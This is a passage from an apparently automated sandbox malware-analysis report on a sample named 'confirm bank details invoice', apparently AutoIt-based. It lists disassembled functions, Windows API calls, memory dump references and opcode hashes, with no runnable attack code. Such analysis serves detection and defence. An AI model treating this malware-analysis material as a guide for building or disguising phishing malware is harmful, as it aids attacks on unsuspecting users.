                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                    • Instruction ID: 580c29c59e74f0ba3b38762f0ee9c22df0c5da6f38f01933d3fe5a42b6da496a
                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                    • Instruction Fuzzy Hash: 9D01427200014AFBCF125E84DD018EF3F22BBAE354B558456FE1859135D37ADAB1AB89
                    Function 00497452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00497A0D: __getptd_noexit.LIBCMT ref: 00497A0E
                    • __lock.LIBCMT ref: 0049748F
                    • InterlockedDecrement.KERNEL32(?), ref: 004974AC
                    • _free.LIBCMT ref: 004974BF
                    • InterlockedIncrement.KERNEL32(011126F0), ref: 004974D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 2704283638-0
                    • Opcode ID: f3a093f1b9274df999377abc98fa4a0ccd50d63c2f4b79d4e4d9292bd95287ef
                    • Instruction ID: 1aa6d5ff6cc52cad97f1669f0961b6d0e2c7ad8f5c886c2a9d53fa66cbec9877
                    • Opcode Fuzzy Hash: f3a093f1b9274df999377abc98fa4a0ccd50d63c2f4b79d4e4d9292bd95287ef
                    • Instruction Fuzzy Hash: 08018E31915622ABCF21AF25A80979EBF60BF05714F15412BF81467692C73C6941DBCA
                    Function 004DEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0048AFE3
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048AFF2
                      • Part of subcall function 0048AF83: BeginPath.GDI32(?), ref: 0048B009
                      • Part of subcall function 0048AF83: SelectObject.GDI32(?,00000000), ref: 0048B033
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004DEA8E
                    • LineTo.GDI32(00000000,?,?), ref: 004DEA9B
                    • EndPath.GDI32(00000000), ref: 004DEAAB
                    • StrokePath.GDI32(00000000), ref: 004DEAB9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 30c626d8eb42bc6dccd61d804abcdce8b246063122fd7d34fae816d69e3f8598
                    • Instruction ID: 0da2a9a498960624be48d6fab67f79e46728244fd02ebb24c97bb6b14b5f0b37
                    • Opcode Fuzzy Hash: 30c626d8eb42bc6dccd61d804abcdce8b246063122fd7d34fae816d69e3f8598
                    • Instruction Fuzzy Hash: CAF0E231401259BBDB12AFA4AD0EFDE3F1AAF16314F044103FB01652E18BB85521DBAD
                    Function 004AC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004AC84A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004AC85D
                    • GetCurrentThreadId.KERNEL32 ref: 004AC864
                    • AttachThreadInput.USER32(00000000), ref: 004AC86B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: 495a4f49b8732d36f588a969b2725aae94e973e4388e18872adb406ed55e19cd
                    • Instruction ID: 6754905ba225cc223bd031e574bd20b36ca2970b5a51b1af27e1454827c8c5a3
                    • Opcode Fuzzy Hash: 495a4f49b8732d36f588a969b2725aae94e973e4388e18872adb406ed55e19cd
                    • Instruction Fuzzy Hash: 79E0657154122876EB102B62DC4DFEB7F5DEF177A1F008026B50DC4450C679C591C7E4
                    Function 004AB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 004AB0D6
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,004AAC9D), ref: 004AB0DD
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004AAC9D), ref: 004AB0EA
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,004AAC9D), ref: 004AB0F1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 440b80ad9892d3fb8232015bb0a9340e9cb51a3fa441bb33f4853bb64089d7cf
                    • Instruction ID: 7a0e30bd378313125e74672dc469dafe5b4493f9e76cb03fc127a65128a779b1
                    • Opcode Fuzzy Hash: 440b80ad9892d3fb8232015bb0a9340e9cb51a3fa441bb33f4853bb64089d7cf
                    • Instruction Fuzzy Hash: F8E08632E01211AFD7201FB15D0CB5B3BA9EF56795F01C838F641D6080DB388411C768
                    Function 0048B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 0048B496
                    • SetTextColor.GDI32(?,000000FF), ref: 0048B4A0
                    • SetBkMode.GDI32(?,00000001), ref: 0048B4B5
                    • GetStockObject.GDI32(00000005), ref: 0048B4BD
                    • GetWindowDC.USER32(?,00000000), ref: 004EDE2B
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004EDE38
                    • GetPixel.GDI32(00000000,?,00000000), ref: 004EDE51
                    • GetPixel.GDI32(00000000,00000000,?), ref: 004EDE6A
                    • GetPixel.GDI32(00000000,?,?), ref: 004EDE8A
                    • ReleaseDC.USER32(?,00000000), ref: 004EDE95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 90263245b60dcce18986e09d787bdebb50e276c557559bd5bd992dc9be8f3e4a
                    • Instruction ID: b27f68cc1a0a35cc79bfbcfc8f803ed93c8e2cce73819dac7e4434b87e99cfa2
                    • Opcode Fuzzy Hash: 90263245b60dcce18986e09d787bdebb50e276c557559bd5bd992dc9be8f3e4a
                    • Instruction Fuzzy Hash: 0EE06D31900280AEDB212F68AC0DBED3F12EB12336F10C626FAA9580E2C3754590DB15
                    Function 004AB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004AB2DF
                    • UnloadUserProfile.USERENV(?,?), ref: 004AB2EB
                    • CloseHandle.KERNEL32(?), ref: 004AB2F4
                    • CloseHandle.KERNEL32(?), ref: 004AB2FC
                      • Part of subcall function 004AAB24: GetProcessHeap.KERNEL32(00000000,?,004AA848), ref: 004AAB2B
                      • Part of subcall function 004AAB24: HeapFree.KERNEL32(00000000), ref: 004AAB32
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: e3ffb078c8250375ce382d1f96aea2c50605b022ff2e255c03a32cbad7969c4e
                    • Instruction ID: 5346c062901af815e40dba22b848888fd1eb89213d47a6d874ed3a489b507b15
                    • Opcode Fuzzy Hash: e3ffb078c8250375ce382d1f96aea2c50605b022ff2e255c03a32cbad7969c4e
                    • Instruction Fuzzy Hash: D8E0BF36504005BBCB012B95DC0886DFBA7FF993253108232F61581571CB32A471EB95
                    Function 004EB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: 60af07703ba2a9c8665d61f33c51e3ef6e606c4b6a0904f384bcfd0c5c84fc10
                    • Instruction ID: 8a7ab6a561b8b69281afe71f74b52b25e4a142615716b5f9a755015d3d9dad82
                    • Opcode Fuzzy Hash: 60af07703ba2a9c8665d61f33c51e3ef6e606c4b6a0904f384bcfd0c5c84fc10
                    • Instruction Fuzzy Hash: 4EE01AB1900204EFEB015F70884CA3E7BA6EF4C355F11882AF95ACB250CB789851DB48
                    Function 004EB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CapsDesktopDeviceReleaseWindow
                    • String ID:
                    • API String ID: 2889604237-0
                    • Opcode ID: fb7fe1909ebdb4b51622deb6e3b69b43ac3a31915e5411d2e39c344d97c254fe
                    • Instruction ID: 97e2a537be56dc6781c54fa1172953ca0e0557108b1c4d20545bf25fab9722ab
                    • Opcode Fuzzy Hash: fb7fe1909ebdb4b51622deb6e3b69b43ac3a31915e5411d2e39c344d97c254fe
                    • Instruction Fuzzy Hash: 6FE046B1900200EFEB016F70C84CA3D7BAAEB4C355F11882AF95ACB250CFB89811CB08
                    Function 004ADCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                    Download Yara Rule
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 004ADEAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container
                    • API String ID: 3565006973-3941886329
                    • Opcode ID: 1377c6f10d2d60490515aaa634c1329f79dbfc42481920eada220b04cfda7a1c
                    • Instruction ID: 1881ead7e2b6c2e4afd1ca021908c6675bdd6edab842c07d058df04f369c9057
                    • Opcode Fuzzy Hash: 1377c6f10d2d60490515aaa634c1329f79dbfc42481920eada220b04cfda7a1c
                    • Instruction Fuzzy Hash: 41914874A00601AFDB14DF64C884B6ABBF5BF5A714F10846EF94ACB690DB74E841CB64
                    Function 004B290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscpy
                    • String ID: I/N$I/N
                    • API String ID: 3048848545-2393203907
                    • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                    • Instruction ID: 14b72cb9adf4888a8699357692311c96ba151d09b84b3dd53305a717b733d02e
                    • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                    • Instruction Fuzzy Hash: DF412A71A00216AACF25DF99D1819FEB770EF08314F50404FF885AB291D7B86E82C778
                    Function 0048BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000000), ref: 0048BCDA
                    • GlobalMemoryStatusEx.KERNEL32 ref: 0048BCF3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: GlobalMemorySleepStatus
                    • String ID: @
                    • API String ID: 2783356886-2766056989
                    • Opcode ID: 810612dd959077ddf78e2f57f5b1d93352428cf77c85b44c75ecebf4af5e6c1f
                    • Instruction ID: 2c7eeeb4f97e5bf4df506f918c6b3bc4e80426569b782967c5e24e083c8a6942
                    • Opcode Fuzzy Hash: 810612dd959077ddf78e2f57f5b1d93352428cf77c85b44c75ecebf4af5e6c1f
                    • Instruction Fuzzy Hash: 6B515672408744ABE320AF55D886BAFBBE8FF95358F414C4EF1C8410A2DF7484A9875A
                    Function 004BC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004744ED: __fread_nolock.LIBCMT ref: 0047450B
                    • _wcscmp.LIBCMT ref: 004BC65D
                    • _wcscmp.LIBCMT ref: 004BC670
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscmp$__fread_nolock
                    • String ID: FILE
                    • API String ID: 4029003684-3121273764
                    • Opcode ID: 83bf2e0e1318289970447647951b80fa89cf4a2453105c6f00b0f466b0ca3ebf
                    • Instruction ID: 92bfadb3e2378eedd71a527c990d65e4e42eb2b7eb48fc2f38ff2a6b99ebcf3d
                    • Opcode Fuzzy Hash: 83bf2e0e1318289970447647951b80fa89cf4a2453105c6f00b0f466b0ca3ebf
                    • Instruction Fuzzy Hash: 91410872A0021ABADF109AA59C81FEF7BB9EF89714F00406BF615E7181D7789A04C765
                    Function 004DA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004DA85A
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004DA86F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: '
                    • API String ID: 3850602802-1997036262
                    • Opcode ID: 7fe5d561ca54ad7c23bfdf1548be7b951e1f6880a6728adcf32987838f9f697d
                    • Instruction ID: 87d60e10d3cb58a29f7109d479d2beb5ea7ce2e22a7b0b2d083d167138cb36c1
                    • Opcode Fuzzy Hash: 7fe5d561ca54ad7c23bfdf1548be7b951e1f6880a6728adcf32987838f9f697d
                    • Instruction Fuzzy Hash: 0741F574E012099FDB14DFA8C891BEABBB9FB08304F10006BE905EB341D774A952DFA5
                    Function 004D975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(?,?,?,?), ref: 004D980E
                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004D984A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$DestroyMove
                    • String ID: static
                    • API String ID: 2139405536-2160076837
                    • Opcode ID: 331c77fd10a7745b0573dfc38991e224ae7a80bcefa024c5137a6aa95d97bcd6
                    • Instruction ID: 6f205114b044703304e21f5b0299622fe28f1c023bcef3c5d6dd52dd1b8fac4f
                    • Opcode Fuzzy Hash: 331c77fd10a7745b0573dfc38991e224ae7a80bcefa024c5137a6aa95d97bcd6
                    • Instruction Fuzzy Hash: FB319E71510604AAEB10AF75CC90BBB73A9FF59764F00861FF8A9D7290CB34AC81D768
                    Function 004B5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B51C6
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004B5201
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoItemMenu_memset
                    • String ID: 0
                    • API String ID: 2223754486-4108050209
                    • Opcode ID: 5aa530b0f52d48da0bc979d7c6904e2b41ca7a6bcfc21bf4fb4ae58ce3be3bc5
                    • Instruction ID: f92841434f31668b427a709a25cb26938c64353bed5a60c13070549b450e3313
                    • Opcode Fuzzy Hash: 5aa530b0f52d48da0bc979d7c6904e2b41ca7a6bcfc21bf4fb4ae58ce3be3bc5
                    • Instruction Fuzzy Hash: 1731C5319016049FEB28CF99E8457DEFBF4AF45350F14445BE981A6290D7789944CF29
                    Function 004C658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __snwprintf
                    • String ID: , $$AUTOITCALLVARIABLE%d
                    • API String ID: 2391506597-2584243854
                    • Opcode ID: 8d2ab7a73ad3d983e1426e6b5930bb72b27e07dae5878ec1a8b077da844be530
                    • Instruction ID: 7e7cced7577b310e0666fb89cc5453d65c744231409028b148100d50249e7fe7
                    • Opcode Fuzzy Hash: 8d2ab7a73ad3d983e1426e6b5930bb72b27e07dae5878ec1a8b077da844be530
                    • Instruction Fuzzy Hash: B5219135A00214ABCF10EFA5D881FED77B4BF45344F41805EF409AB181DA78EA45CBA9
                    Function 004D93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004D945C
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004D9467
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: Combobox
                    • API String ID: 3850602802-2096851135
                    • Opcode ID: 95d6a46f17b65a7dc4830f4f234c363c987afd3d78c9bc02f9f3bae27cdf5e5d
